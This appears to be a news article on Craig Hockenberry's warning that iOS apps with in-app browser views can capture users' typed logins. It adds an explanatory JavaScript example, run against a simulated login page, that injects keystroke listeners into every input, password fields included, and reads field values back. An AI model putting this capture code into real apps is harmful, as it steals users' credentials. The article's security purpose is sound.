App developer Craig Hockenberry has published an article today titled “in-app browsers considered harmful,” warning both developers and users about a security problem with apps that rely on in-app browser views. “Would it surprise you to know that every one of those apps could eavesdrop on your typing? Even when it’s in a secure login screen with a password field?”
Many apps send users to an in-app browser to do things like authenticate logins for associated services. Think of logging into an app using your Facebook or Twitter credentials, as highlighted in the proof of concept video above. You might assume that is as safe as doing so through Safari, but Hockenberry notes that, unlike Safari, the in-app view is relatively easy for the hosting app to exploit to capture username and password data.
The report adds that the technique was tested on iOS 7 and iOS 8. Hockenberry says that is the reason his company’s app Twitterrific “did its token exchange in Safari, even though it’s a more complex user interaction and a more difficult technical implementation.” That, however, isn’t something required by Apple’s app review procedures, and users might feel an in-app browser view is as secure as Safari.
Unfortunately, Apple’s current App Review policy does not agree with this recommendation or with Twitterrific’s previous implementation. This is why our update for iOS 8 was delayed—it was the first time since the launch of the App Store that we haven’t had a new version on release day.
The article doesn’t offer Apple a clear remedy. Hockenberry notes that any fix to the core issue in WebKit and UIWebView would have to ship with the operating system itself (“Apple would need to release a new version of iOS for each version that included Safari and WebKit”), and he stresses that the flaw is in the access model rather than in the rendering engine: “No, this is not a WebKit bug… The problem is that an iOS app has as much access to these technologies as the developer of the web page.”
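To make that last point concrete, here is an added example (not code from Hockenberry’s post or from Twitterrific) that models the eavesdropping technique in plain JavaScript. A native app hosting a web view can evaluate arbitrary script in any page it loads (UIWebView exposes stringByEvaluatingJavaScriptFromString: for exactly this, and WKWebView’s evaluateJavaScript:completionHandler: gives the same reach), and that script runs with the same privileges as the page’s own. The DOM stand-in, the login form, the typed sample input and the `sink` collector are all constructed for this example so it runs offline under Node; a real host would pass the same script into the web view and read the result back from native code.

```javascript
'use strict';

// Constructed stand-in for a login page's DOM so the example runs under Node
// with no browser: an input has a value and an event-listener table, and the
// document can enumerate its inputs. Nothing else is modelled.
function makeElement(type, name) {
  const el = { tagName: 'INPUT', type, name, value: '', _handlers: {} };
  el.addEventListener = (event, fn) => {
    (el._handlers[event] = el._handlers[event] || []).push(fn);
  };
  el.dispatchEvent = (ev) => {
    (el._handlers[ev.type] || []).forEach((fn) => fn(ev));
  };
  return el;
}

function makeLoginDocument() {
  const inputs = [makeElement('text', 'username'), makeElement('password', 'password')];
  return {
    inputs,
    // A real page's querySelectorAll('input') would return the same elements.
    querySelectorAll: (selector) => (selector === 'input' ? inputs.slice() : []),
  };
}

// The script the hosting app injects. The page cannot distinguish it from a
// script the site's own author shipped: there is no origin boundary between the
// host app and the page it is displaying. `sink` stands in for whatever channel
// the native side uses to collect results (assumed here; a real host can simply
// poll a JavaScript variable from Objective-C).
function injectKeystrokeCapture(doc, sink) {
  for (const input of doc.querySelectorAll('input')) {
    // A password field is no different from any other input at this layer:
    // the browser masks the characters on screen, not in the event stream.
    input.addEventListener('keydown', (ev) => {
      sink.push({ field: input.name, type: input.type, key: ev.key });
    });
  }
  return sink;
}

// Reconstruct what was typed into each field from the captured events.
function typedPerField(sink) {
  const out = {};
  for (const e of sink) out[e.field] = (out[e.field] || '') + e.key;
  return out;
}

// Simulate the user typing into a field: one keydown per character, as the
// browser would deliver it, followed by the field's value updating.
function typeInto(input, text) {
  for (const ch of text) {
    input.dispatchEvent({ type: 'keydown', key: ch });
    input.value += ch;
  }
}

// The host does not even need to hook events: because it can evaluate any
// script it likes, it can read the current field values directly at any time.
function readFieldValues(doc) {
  const out = {};
  for (const input of doc.querySelectorAll('input')) out[input.name] = input.value;
  return out;
}

// End to end: the host injects before the user types, the user logs in, and
// the host reads back both the keystrokes and the final field values.
function demo() {
  const doc = makeLoginDocument();
  const sink = injectKeystrokeCapture(doc, []);
  const [user, pass] = doc.inputs;
  typeInto(user, 'alice');    // constructed sample input
  typeInto(pass, 'hunter2');  // constructed sample input
  return { keystrokes: typedPerField(sink), values: readFieldValues(doc) };
}

console.log(demo());
```

The takeaway for a developer is the one Hockenberry draws: nothing the web page does (HTTPS, a password-type input, or its own scripts) protects it from the app hosting the view, so a credential or token exchange is only as trustworthy as that app. Handing the login off to Safari puts it in a separate process the app cannot script, at the cost of the more awkward round trip the article describes.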
For now, Hockenberry suggests that users avoid typing sensitive usernames or passwords into an in-app browser view.